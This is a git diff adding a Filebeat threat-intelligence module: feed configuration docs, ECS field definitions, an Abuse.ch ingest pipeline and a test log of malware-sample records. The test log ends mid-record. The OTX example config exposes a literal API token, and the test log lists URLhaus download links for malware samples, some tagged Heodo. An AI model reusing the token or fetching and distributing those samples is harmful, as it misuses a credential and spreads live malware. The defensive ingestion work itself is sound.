+include::../include/var-paths.asciidoc[] + +*`var.url`*:: + +The URL of the API endpoint to connect with. + +*`var.interval`*:: + +How often the API is polled for updated information. + +*`var.first_interval`*:: + +How far back to search when retrieving events the first time the beat starts up. +After the first interval has passed the module itself will use the timestamp from the last response as the filter when retrieving new events. + +*`var.filters`*:: + +List of filters to apply when retrieving new events from the MISP server, this field is optional and defaults to all events. + +MISP Threat Intel is mapped to the following ECS fields +[options="header"] +|============================================================== +| Malware Threat IntelFields | ECS Fields | +| misp.first_seen | threat.indicator.first_seen | +| misp.last_seen | threat.indicator.last_seen | +| misp.tag | tag | +| misp.value | threat.indicator.* | +|============================================================== +misp.value is mapped to the appropriate field dependant on attribute type + +[float] +==== `otx` fileset settings + +To configure the module, please utilize the default URL unless specified as the example below: + +[source,yaml] +---- +- module: threatintel + otx: + enabled: true + var.input: httpjson + var.url: https://otx.alienvault.com/api/v1/indicators/export + var.api_token: 754dcaafbcb9740dc0d119e72d5eaad699cc4a5cdbc856fc6215883842ba8142 + var.first_interval: 24h + var.lookback_range: 2h + var.interval: 60m +---- + +To filter only on specific indicator types, this is an example of some possible filters supported: + +[source,yaml] +---- +- module: threatintel + otx: + enabled: true + var.input: httpjson + var.url: https://otx.alienvault.com/api/v1/indicators/export + var.types: "domain,IPv4,hostname,url,FileHash-SHA256" + var.first_interval: 24h + var.interval: 60m +---- + +include::../include/var-paths.asciidoc[] + +*`var.url`*:: + +The URL of the API endpoint to connect with. + +*`var.api_token`*:: + +The API key used to access OTX. This can be found on your https://otx.alienvault.com/api[OTX API homepage]. + +*`var.interval`*:: + +How often the API is polled for updated information. + +*`var.first_interval`*:: + +How far back to search when retrieving events the first time the beat starts up. +After the first interval has passed the module itself will use the timestamp from the last response as the filter when retrieving new events. + +*`var.types`*:: + +A comma delimited list of indicator types to include, defaults to all. A list of possible types to filter on can be found on the https://cybersecurity.att.com/documentation/usm-appliance/otx/about-otx.htm[Alienvault OTX documentation page] + + +OTX Threat Intel is mapped to the following ECS fields +[options="header"] +|======================================================| +| Malware Threat IntelFields | ECS Fields | +| otx.type | threat.indicator.type | +| otx.description | threat.indicator.description | +| otx.indicator | threat.indicator.* | +|======================================================| +otx.indicator is mapped to the appropriate field dependant on attribute type. + +[float] +==== `anomali` fileset settings + +To configure the module please fill in the credentials, for Anomali Limo (the free Taxii service) these are usually default credentials found at the https://www.anomali.com/resources/limo[Anomali Limo webpage] +Anomali Limo offers multiple sources called collections. Each collection has a specific ID, which then fits into the url +used in this configuration. A list of different collections can be found using the credentials at https://limo.anomali.com/api/v1/taxii2/feeds/collections/[Limo Collections]. + +The example below uses the collection of ID 41 as can be seen in the URL. + +[source,yaml] +---- +- module: threatintel + anomali: + enabled: true + var.input: httpjson + var.url: https://limo.anomali.com/api/v1/taxii2/feeds/collections/41/objects?match[type]=indicator + var.username: guest + var.password: guest + var.interval: 60m +---- + +To filter on specifc types, you can define var.types as a comma delimited list of object types. This defaults to "indicators" + +[source,yaml] +---- +- module: threatintel + anomali: + enabled: true + var.input: httpjson + var.url: https://limo.anomali.com/api/v1/taxii2/feeds/collections/41/objects?match[type]=indicator + var.types: "indicators,other" + var.username: guest + var.password: guest + var.interval: 60m +---- + +include::../include/var-paths.asciidoc[] + +*`var.url`*:: + +The URL of the API endpoint to connect with. Limo offers multiple collections of threat intelligence. + +*`var.username`*:: + +Username used to access the API. + +*`var.password`*:: + +Password used to access the API. + +*`var.interval`*:: + +How often the API is polled for updated information. + +*`var.types`*:: + +A comma delimited list of indicator types to include, defaults to all. A list of possible types to filter on can be found on the https://oasis-open.github.io/cti-documentation/stix/intro.html#stix-21-objects[Stix 2.1 Object types] page. + +Anomali Threat Intel is mapped to the following ECS fields +[options="header"] +|============================================================== +| Malware Threat IntelFields | ECS Fields | +| anomali.description | threat.indicator.description | +| anomali.created | threat.indicator.first_seen | +| anomali.modified | threat.indicator.last_seen | +| anomali.pattern | threat.indicator.* | +| anomali.labels | tags | +|============================================================== +anomali.pattern is mapped to the appropriate field dependant on attribute type. + +:modulename!: diff --git a/x-pack/filebeat/module/threatintel/_meta/fields.yml b/x-pack/filebeat/module/threatintel/_meta/fields.yml new file mode 100644 index 000000000000..c399b21ec66b --- /dev/null +++ b/x-pack/filebeat/module/threatintel/_meta/fields.yml @@ -0,0 +1,365 @@ +- key: threatintel + title: threatintel + release: beta + description: > + Threat intelligence Filebeat Module. + fields: + - name: threatintel + default_field: false + type: group + description: > + Fields from the threatintel Filebeat module. + fields: + - name: indicator.first_seen + type: keyword + description: > + The date and time when intelligence source first reported sighting this indicator. + - name: indicator.last_seen + type: date + description: > + The date and time when intelligence source last reported sighting this indicator. + - name: indicator.sightings + type: long + description: > + Number of times this indicator was observed conducting threat activity. + - name: indicator.type + type: keyword + description: > + Type of indicator as represented by Cyber Observable in STIX 2.0. + Expected values + * autonomous-system + * artifact + * directory + * domain-name + * email-addr + * file + * ipv4-addr + * ipv6-addr + * mac-addr + * mutex + * process + * software + * url + * user-account + * windows-registry-key + * x-509-certificate + - name: indicator.description + type: keyword + description: > + Describes the type of action conducted by the threat. + - name: indicator.scanner_stats + type: long + description: > + Count of AV/EDR vendors that successfully detected malicious file or URL. + - name: indicator.provider + type: keyword + description: > + Identifies the name of the intelligence provider. + - name: indicator.confidence + type: keyword + description: > + Identifies the confidence rating assigned by the provider using STIX confidence scales. + Expected values + * Not Specified, None, Low, Medium, High + * 0-10 + * Admirality Scale (1-6) + * DNI Scale (5-95) + * WEP Scale (Impossible - Certain) + - name: indicator.module + type: keyword + description: > + Identifies the name of specific module this data is coming from. + - name: indicator.dataset + type: keyword + description: > + Identifies the name of specific dataset from the intelligence source. + - name: indicator.ip + type: ip + description: > + Identifies a threat indicator as an IP address (irrespective of direction). + - name: indicator.domain + type: keyword + description: > + Identifies a threat indicator as a domain (irrespective of direction). + - name: indicator.port + type: long + description: > + Identifies a threat indicator as a port number (irrespective of direction). + - name: indicator.email.address + type: keyword + description: > + Identifies a threat indicator as an email address (irrespective of direction). + - name: indicator.marking.tlp + type: keyword + description: > + Traffic Light Protocol sharing markings. + Expected values are: + * White + * Green + * Amber + * Red + - name: indicator.matched + type: group + fields: + - name: atomic + type: keyword + description: > + Identifies the atomic indicator that matched a local environment endpoint or network event. + - name: field + type: keyword + description: > + Identifies the field of the atomic indicator that matched a local environment endpoint or network event. + - name: type + type: keyword + description: > + Identifies the type of the atomic indicator that matched a local environment endpoint or network event. + - name: indicator.as + type: group + fields: + - name: number + type: long + description: Unique number allocated to the autonomous system. The autonomous system number (ASN) + uniquely identifies each network on the Internet. + example: 15169 + - name: organization.name + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + description: Organization name. + example: Google LLC + - name: indicator.registry + type: group + fields: + - name: data.strings + type: keyword + ignore_above: 1024 + description: > + Content when writing string types. + Populated as an array when writing string data to the registry. For single + string registry types (REG_SZ, REG_EXPAND_SZ), this should be an array with + one string. For sequences of string with REG_MULTI_SZ, this array will be + variable length. For numeric data, such as REG_DWORD and REG_QWORD, this should + be populated with the decimal representation (e.g `"1"`). + example: '["C:\rta\red_ttp\bin\myapp.exe"]' + - name: path + type: keyword + ignore_above: 1024 + description: Full path, including hive, key and value + example: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution + Options\winword.exe\Debugger + - name: value + type: keyword + ignore_above: 1024 + description: Name of the value written. + example: Debugger + - name: key + type: keyword + ignore_above: 1024 + description: Registry key value + - name: indicator.geo + type: group + fields: + - name: geo.city_name + type: keyword + ignore_above: 1024 + description: City name. + example: Montreal + - name: geo.country_iso_code + type: keyword + ignore_above: 1024 + description: Country ISO code. + example: CA + - name: geo.country_name + type: keyword + ignore_above: 1024 + description: Country name. + example: Canada + - name: geo.location + type: geo_point + description: Longitude and latitude. + example: '{ "lon": -73.614830, "lat": 45.505918 }' + - name: geo.region_iso_code + type: keyword + ignore_above: 1024 + description: Region ISO code. + example: CA-QC + - name: geo.region_name + type: keyword + ignore_above: 1024 + description: Region name. + example: Quebec + - name: indicator.file.pe.imphash + type: keyword + ignore_above: 1024 + description: 'A hash of the imports in a PE file. An imphash -- or import hash + -- can be used to fingerprint binaries even after recompilation or other code-level + transformations have occurred, which would change more traditional hash values. + Learn more at https://www.fireeye.com/blog/threat-research/2014/01/tracking-malware-import-hashing.html.' + example: 0c6803c4e922103c4dca5963aad36ddf + - name: indicator.file + type: group + fields: + - name: hash + type: group + fields: + - name: tlsh + type: keyword + description: > + The file's import tlsh, if available. + - name: ssdeep + type: keyword + description: > + The file's ssdeep hash, if available. + - name: md5 + type: keyword + description: > + The file's md5 hash, if available. + - name: sha1 + type: keyword + description: > + The file's sha1 hash, if available. + - name: sha256 + type: keyword + description: > + The file's sha256 hash, if available. + - name: sha512 + type: keyword + description: > + The file's sha512 hash, if available. + - name: type + type: keyword + ignore_above: 1024 + description: > + The file type + - name: size + type: long + description: > + The file's total size + - name: name + type: keyword + description: > + The file's name + - name: indicator.url + type: group + fields: + - name: domain + type: keyword + description: > + Domain of the url, such as "www.elastic.co". + - name: extension + type: keyword + ignore_above: 1024 + description: > + The field contains the file extension from the original request + - name: fragment + type: keyword + ignore_above: 1024 + description: > + Portion of the url after the `#`, such as "top". + - name: full + type: keyword + description: > + If full URLs are important to your use case, they should be stored + in `url.full`, whether this field is reconstructed or present in the event + source. + - name: original + type: keyword + description: > + Unmodified original url as seen in the event source. + Note that in network monitoring, the observed URL may be a full URL, whereas + in access logs, the URL is often just represented as a path. + This field is meant to represent the URL as it was observed, complete or not. + - name: password + type: keyword + ignore_above: 1024 + description: > + Password of the request. + - name: path + type: keyword + description: > + Path of the request, such as "/search". + - name: port + type: long + format: string + description: > + Port of the request, such as 443. + - name: query + type: keyword + ignore_above: 1024 + description: > + The query field describes the query string of the request, such + as "q=elasticsearch". + The `?` is excluded from the query string. If a URL contains no `?`, there + is no query field. If there is a `?` but no query, the query field exists + with an empty string. The `exists` query can be used to differentiate between + the two cases. + - name: registered_domain + type: keyword + description: > + The highest registered url domain, stripped of the subdomain. + For example, the registered domain for "foo.example.com" is "example.com". + This value can be determined precisely with a list like the public suffix + list (http://publicsuffix.org). Trying to approximate this by simply taking + the last two labels will not work well for TLDs such as "co.uk". + - name: scheme + type: keyword + ignore_above: 1024 + description: > + Scheme of the request, such as "https". + - name: subdomain + type: keyword + ignore_above: 1024 + description: > + The subdomain portion of a fully qualified domain name includes + all of the names except the host name under the registered_domain. In a partially + qualified domain, or if the the qualification level of the full name cannot + be determined, subdomain contains all of the names below the registered domain. + For example the subdomain portion of "www.east.mydomain.co.uk" is "east". + If the domain has multiple levels of subdomain, such as "sub2.sub1.example.com", + the subdomain field should contain "sub2.sub1", with no trailing period. + - name: top_level_domain + type: keyword + ignore_above: 1024 + description: > + The effective top level domain (eTLD), also known as the domain + suffix, is the last part of the domain name. For example, the top level domain + for example.com is "com". + This value can be determined precisely with a list like the public suffix + list (http://publicsuffix.org). Trying to approximate this by simply taking + the last label will not work well for effective TLDs such as "co.uk". + - name: username + type: keyword + ignore_above: 1024 + description: > + Username of the request. + - name: indicator.x509 + type: group + fields: + - name: serial_number + type: keyword + ignore_above: 1024 + description: Unique serial number issued by the certificate authority. For consistency, + if this value is alphanumeric, it should be formatted without colons and uppercase + characters. + example: 55FBB9C7DEBF09809D12CCAA + - name: issuer + type: keyword + ignore_above: 1024 + description: Name of issuing certificate authority. Could be either Distinguished Name (DN) or Common Name (CN), depending on source. + example: C=US, O=Example Inc, OU=www.example.com, CN=Example SHA2 High Assurance + Server CA + - name: subject + type: keyword + ignore_above: 1024 + description: Name of the certificate subject entity. Could be either Distinguished Name (DN) or Common Name (CN), depending on source. + example: C=US, ST=California, L=San Francisco, O=Example, Inc., CN=shared.global.example.net + - name: alternative_names + type: keyword + ignore_above: 1024 + description: List of subject alternative names (SAN). Name types vary by certificate + authority and certificate type but commonly contain IP addresses, DNS names + (and wildcards), and email addresses. + example: '*.elastic.co' \ No newline at end of file diff --git a/x-pack/filebeat/module/threatintel/abusemalware/_meta/fields.yml b/x-pack/filebeat/module/threatintel/abusemalware/_meta/fields.yml new file mode 100644 index 000000000000..55f8657bc6ec --- /dev/null +++ b/x-pack/filebeat/module/threatintel/abusemalware/_meta/fields.yml @@ -0,0 +1,34 @@ +- name: abusemalware + type: group + description: > + Fields for AbuseCH Malware Threat Intel + fields: + - name: file_type + type: keyword + description: > + File type guessed by URLhaus. + + - name: signature + type: keyword + description: > + Malware familiy. + + - name: urlhaus_download + type: keyword + description: > + Location (URL) where you can download a copy of this file. + + - name: virustotal.result + type: keyword + description: > + AV detection ration. + + - name: virustotal.percent + type: float + description: > + AV detection in percent. + + - name: virustotal.link + type: keyword + description: > + Link to the Virustotal report. \ No newline at end of file diff --git a/x-pack/filebeat/module/threatintel/abusemalware/config/config.yml b/x-pack/filebeat/module/threatintel/abusemalware/config/config.yml new file mode 100644 index 000000000000..5922dd8838a5 --- /dev/null +++ b/x-pack/filebeat/module/threatintel/abusemalware/config/config.yml @@ -0,0 +1,42 @@ +{{ if eq .input "httpjson" }} + +type: httpjson +config_version: "2" +interval: {{ .interval }} + +request.method: GET +{{ if .ssl }} + - request.ssl: {{ .ssl | tojson }} +{{ end }} +request.url: {{ .url }} +request.transforms: +- set: + target: header.Content-Type + value: application/json + +response.split: + target: body.payloads + +{{ else if eq .input "file" }} + +type: log +paths: +{{ range $i, $path := .paths }} + - {{$path}} +{{ end }} +exclude_files: [".gz$"] + +{{ end }} + +tags: {{.tags | tojson}} +publisher_pipeline.disable_host: {{ inList .tags "forwarded" }} + +processors: + - decode_json_fields: + document_id: "md5_hash" + fields: [message] + target: json + - add_fields: + target: '' + fields: + ecs.version: 1.6.0 diff --git a/x-pack/filebeat/module/threatintel/abusemalware/ingest/pipeline.yml b/x-pack/filebeat/module/threatintel/abusemalware/ingest/pipeline.yml new file mode 100644 index 000000000000..0ff51bf0528c --- /dev/null +++ b/x-pack/filebeat/module/threatintel/abusemalware/ingest/pipeline.yml @@ -0,0 +1,138 @@ +description: Pipeline for parsing Abuse.ch Malware Threat Intel +processors: + +#################### +# Event ECS fields # +#################### +- set: + field: event.ingested + value: '{{_ingest.timestamp}}' +- set: + field: event.kind + value: enrichment +- set: + field: event.category + value: threat +- set: + field: event.type + value: indicator + +###################### +# General ECS fields # +###################### +- rename: + field: json + target_field: threatintel.abusemalware + ignore_missing: true + +##################### +# Threat ECS Fields # +##################### +- date: + field: threatintel.abusemalware.firstseen + target_field: threatintel.indicator.first_seen + formats: + - "yyyy-MM-dd HH:mm:ss z" + - "yyyy-MM-dd HH:mm:ss Z" + - "yyyy-MM-dd HH:mm:ss" + if: "ctx?.threatintel?.abusemalware.firstseen != null" +- set: + field: threatintel.indicator.type + value: file +- rename: + field: threatintel.abusemalware.file_size + target_field: threatintel.indicator.file.size + ignore_missing: true +- rename: + field: threatintel.abusemalware.file_type + target_field: threatintel.indicator.file.type + ignore_missing: true +- rename: + field: threatintel.abusemalware.urlhaus_download + target_field: event.reference + ignore_missing: true +- convert: + field: threatintel.indicator.file.size + type: long + ignore_missing: true +- rename: + field: threatintel.abusemalware.md5_hash + target_field: threatintel.indicator.file.hash.md5 + ignore_missing: true +- rename: + field: threatintel.abusemalware.sha256_hash + target_field: threatintel.indicator.file.hash.sha256 + ignore_missing: true +- rename: + field: threatintel.abusemalware.imphash + target_field: threatintel.indicator.file.pe.imphash + ignore_missing: true +- rename: + field: threatintel.abusemalware.ssdeep + target_field: threatintel.indicator.file.hash.ssdeep + ignore_missing: true +- rename: + field: threatintel.abusemalware.tlsh + target_field: threatintel.indicator.file.hash.tlsh + ignore_missing: true +- append: + field: related.hash + value: '{{ threatintel.indicator.file.hash.md5 }}' + if: ctx?.threatintel?.indicator?.file?.hash?.md5 != null +- append: + field: related.hash + value: '{{ threatintel.indicator.file.hash.sha256 }}' + if: ctx?.threatintel?.indicator?.file?.hash?.sha256 != null +- append: + field: related.hash + value: '{{ threatintel.indicator.file.hash.ssdeep }}' + if: ctx?.threatintel?.indicator?.file?.hash?.ssdeep != null +- append: + field: related.hash + value: '{{ threatintel.indicator.file.pe.imphash }}' + if: ctx?.threatintel?.indicator?.file?.pe?.imphash != null +- append: + field: related.hash + value: '{{ threatintel.indicator.file.pe.tlsh }}' + if: ctx?.threatintel?.indicator?.file?.pe?.tlsh != null + +###################### +# Cleanup processors # +###################### +- set: + field: threatintel.indicator.type + value: unknown + if: ctx?.threatintel?.indicator?.type == null +- script: + lang: painless + if: ctx?.threatintel != null + source: | + void handleMap(Map map) { + for (def x : map.values()) { + if (x instanceof Map) { + handleMap(x); + } else if (x instanceof List) { + handleList(x); + } + } + map.values().removeIf(v -> v == null); + } + void handleList(List list) { + for (def x : list) { + if (x instanceof Map) { + handleMap(x); + } else if (x instanceof List) { + handleList(x); + } + } + } + handleMap(ctx); +- remove: + field: + - threatintel.abusemalware.firstseen + - message + ignore_missing: true +on_failure: +- set: + field: error.message + value: '{{ _ingest.on_failure_message }}' diff --git a/x-pack/filebeat/module/threatintel/abusemalware/manifest.yml b/x-pack/filebeat/module/threatintel/abusemalware/manifest.yml new file mode 100644 index 000000000000..e3159060cd81 --- /dev/null +++ b/x-pack/filebeat/module/threatintel/abusemalware/manifest.yml @@ -0,0 +1,16 @@ +module_version: 1.0 + +var: + - name: input + default: httpjson + - name: interval + default: 60m + - name: url + default: "https://urlhaus-api.abuse.ch/v1/payloads/recent/" + - name: ssl + - name: tags + default: [threatintel-abusemalware, forwarded] + +ingest_pipeline: + - ingest/pipeline.yml +input: config/config.yml diff --git a/x-pack/filebeat/module/threatintel/abusemalware/test/abusechmalware.ndjson.log b/x-pack/filebeat/module/threatintel/abusemalware/test/abusechmalware.ndjson.log new file mode 100644 index 000000000000..0d67f2a7086e --- /dev/null +++ b/x-pack/filebeat/module/threatintel/abusemalware/test/abusechmalware.ndjson.log @@ -0,0 +1,25 @@ +{"md5_hash":"7871286a8f1f68a14b18ae475683f724","sha256_hash":"48a6aee18bcfe9058b35b1018832aef1c9efd8f50ac822f49abb484a5e2a4b1f","file_type":"dll","file_size":"277504","signature":null,"firstseen":"2021-01-14 06:14:05","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/48a6aee18bcfe9058b35b1018832aef1c9efd8f50ac822f49abb484a5e2a4b1f/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG5:X5DpBw/KViMTB1MnEWk0115JW","tlsh":"1344D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717"} +{"md5_hash":"7b4c77dc293347b467fb860e34515163","sha256_hash":"ec59538e8de8525b1674b3b8fe0c180ac822145350bcce054ad3fc6b95b1b5a4","file_type":"dll","file_size":"277504","signature":null,"firstseen":"2021-01-14 06:11:41","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/ec59538e8de8525b1674b3b8fe0c180ac822145350bcce054ad3fc6b95b1b5a4/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGY:X5DpBw/KViMTB1MnEWk0115Jr","tlsh":"4E44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717"} +{"md5_hash":"373d34874d7bc89fd4cefa6272ee80bf","sha256_hash":"b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7","file_type":"dll","file_size":"277504","signature":null,"firstseen":"2021-01-14 06:11:22","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7/","virustotal":{"result":"25 / 66","percent":"37.88","link":"https://www.virustotal.com/gui/file/b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7/detection/f-b0e914d"},"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGG:X5DpBw/KViMTB1MnEWk0115Jd","tlsh":"7544D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717"} +{"md5_hash":"e2e02aae857488dbdbe6631c29abf3f8","sha256_hash":"7483e834a73fb6817769596fe4c0fa01d28639f52bbbdc2b8a56c36d466dd7f8","file_type":"dll","file_size":"284672","signature":null,"firstseen":"2021-01-14 06:11:21","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/7483e834a73fb6817769596fe4c0fa01d28639f52bbbdc2b8a56c36d466dd7f8/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJ9:0h3eZgRQCcw+MN54dEq7kqRtoLZH","tlsh":"5554CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717"} +{"md5_hash":"3e988e32b0c3c230d534e286665b89a5","sha256_hash":"760e729426fb115b967a41e5a6f2f42d7a52a5cee74ed99065a6dc39bf89f59b","file_type":"unknown","file_size":"352","signature":null,"firstseen":"2021-01-14 06:08:02","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/760e729426fb115b967a41e5a6f2f42d7a52a5cee74ed99065a6dc39bf89f59b/","virustotal":null,"imphash":null,"ssdeep":"6:TE6ll8uXi0jIAv6BHvPuA7RKTmOQamsQMGvMQgTYbtsWsQ72hCqPZG/:TTll8uTo5uA7RKtQamsS0QJfsQ7mCR","tlsh":"3CE0C002AB26C036500D154C221655B3B871911503CA14E6A6824BEA765D4A3290D190"} +{"md5_hash":"dcc20d534cdf29eab03d8148bf728857","sha256_hash":"86655c0bcf9b21b5efc682f58eb80f42811042ba152358e1bfbbb867315a60ac","file_type":"dll","file_size":"277504","signature":null,"firstseen":"2021-01-14 06:08:02","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/86655c0bcf9b21b5efc682f58eb80f42811042ba152358e1bfbbb867315a60ac/","virustotal":{"result":"27 / 69","percent":"39.13","link":"https://www.virustotal.com/gui/file/86655c0bcf9b21b5efc682f58eb80f42811042ba152358e1bfbbb867315a60ac/detection/f-86655c0"},"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGI:X5DpBw/KViMTB1MnEWk0115JH","tlsh":"0D44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717"} +{"md5_hash":"f6facbf7a90b9e67a6de9f6634eb40ba","sha256_hash":"e91c9e11d3ce4f55fabd7196279367482d2fabfa32df81e614b15fc53b4e26be","file_type":"dll","file_size":"284672","signature":null,"firstseen":"2021-01-14 06:07:53","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/e91c9e11d3ce4f55fabd7196279367482d2fabfa32df81e614b15fc53b4e26be/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJ1:0h3eZgRQCcw+MN54dEq7kqRtoLZL","tlsh":"2554CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717"} +{"md5_hash":"44325fd5bdda2e2cdea07c3a39953bb1","sha256_hash":"beedbbcacfc34b5edd8c68e3e4acf364992ebbcd989548e09e38fa03c5659bac","file_type":"dll","file_size":"277504","signature":null,"firstseen":"2021-01-14 06:07:41","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/beedbbcacfc34b5edd8c68e3e4acf364992ebbcd989548e09e38fa03c5659bac/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG/:X5DpBw/KViMTB1MnEWk0115Jg","tlsh":"A044D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717"} +{"md5_hash":"4c549051950522a3f1b0814aa9b1f6d1","sha256_hash":"7cba55da723c0e020267a02e6ffc83e03a83701757fc4ec65ea398618ad881cf","file_type":"dll","file_size":"277504","signature":"Heodo","firstseen":"2021-01-14 06:07:31","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/7cba55da723c0e020267a02e6ffc83e03a83701757fc4ec65ea398618ad881cf/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG4:X5DpBw/KViMTB1MnEWk0115Jv","tlsh":"4544D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717"} +{"md5_hash":"d7333113098d88b6a5dd5b8eb24f9b87","sha256_hash":"426be5e085e6bbad8430223dc89d8d3ced497133f8d478fd00005bcbb73399d4","file_type":"dll","file_size":"284672","signature":null,"firstseen":"2021-01-14 06:07:07","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/426be5e085e6bbad8430223dc89d8d3ced497133f8d478fd00005bcbb73399d4/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJw:0h3eZgRQCcw+MN54dEq7kqRtoLZW","tlsh":"9454CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717"} +{"md5_hash":"c8dbb261c1f450534c3693da2f4b479f","sha256_hash":"25093afdaeb3ea000743ab843360a6b64f58c0a1ab950072ba6528056735deb9","file_type":"dll","file_size":"277504","signature":null,"firstseen":"2021-01-14 06:07:07","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/25093afdaeb3ea000743ab843360a6b64f58c0a1ab950072ba6528056735deb9/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGe:X5DpBw/KViMTB1MnEWk0115JR","tlsh":"F344D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717"} +{"md5_hash":"714953f1d0031a4bb2f0c44afd015931","sha256_hash":"b3327a96280365e441057f490df6261c9a2400fd63719eb9a7a0c9db95beecc5","file_type":"dll","file_size":"277504","signature":null,"firstseen":"2021-01-14 06:07:06","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/b3327a96280365e441057f490df6261c9a2400fd63719eb9a7a0c9db95beecc5/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGc:X5DpBw/KViMTB1MnEWk0115J7","tlsh":"F644D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717"} +{"md5_hash":"20fd22742500d4cec123398afc3d3672","sha256_hash":"e92b54904391c171238863b584355197ba4508f73320a8e89afbb5425fc2dc4b","file_type":"dll","file_size":"277504","signature":null,"firstseen":"2021-01-14 06:07:00","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/e92b54904391c171238863b584355197ba4508f73320a8e89afbb5425fc2dc4b/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGc:X5DpBw/KViMTB1MnEWk0115JP","tlsh":"BE44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717"} +{"md5_hash":"aa81ceea053797a6f8c38a0f2f9b80b0","sha256_hash":"dd15e74b3cd3a4fdb5f47adefd6f90e27d5a20e01316cc791711f6dce7c0f52e","file_type":"dll","file_size":"277504","signature":null,"firstseen":"2021-01-14 06:06:36","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/dd15e74b3cd3a4fdb5f47adefd6f90e27d5a20e01316cc791711f6dce7c0f52e/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGf:X5DpBw/KViMTB1MnEWk0115Jo","tlsh":"CC44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717"} +{"md5_hash":"a2ce6795664c0fa93b07fa54ba868991","sha256_hash":"0fae1eeabc4f5e07bd16f7851aec5ab6032d407c7ff0270f2b6e85c2a3efebd1","file_type":"dll","file_size":"277504","signature":"Heodo","firstseen":"2021-01-14 06:06:13","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/0fae1eeabc4f5e07bd16f7851aec5ab6032d407c7ff0270f2b6e85c2a3efebd1/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGD:X5DpBw/KViMTB1MnEWk0115JY","tlsh":"8C44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717"} +{"md5_hash":"9b9bac158dacb9c2f5511e9c464a7de4","sha256_hash":"07a9d84c0b2c8cf1fd90ab409b9399d06920ab4b6efb647b5a3b9bef1045ee7e","file_type":"dll","file_size":"280064","signature":null,"firstseen":"2021-01-14 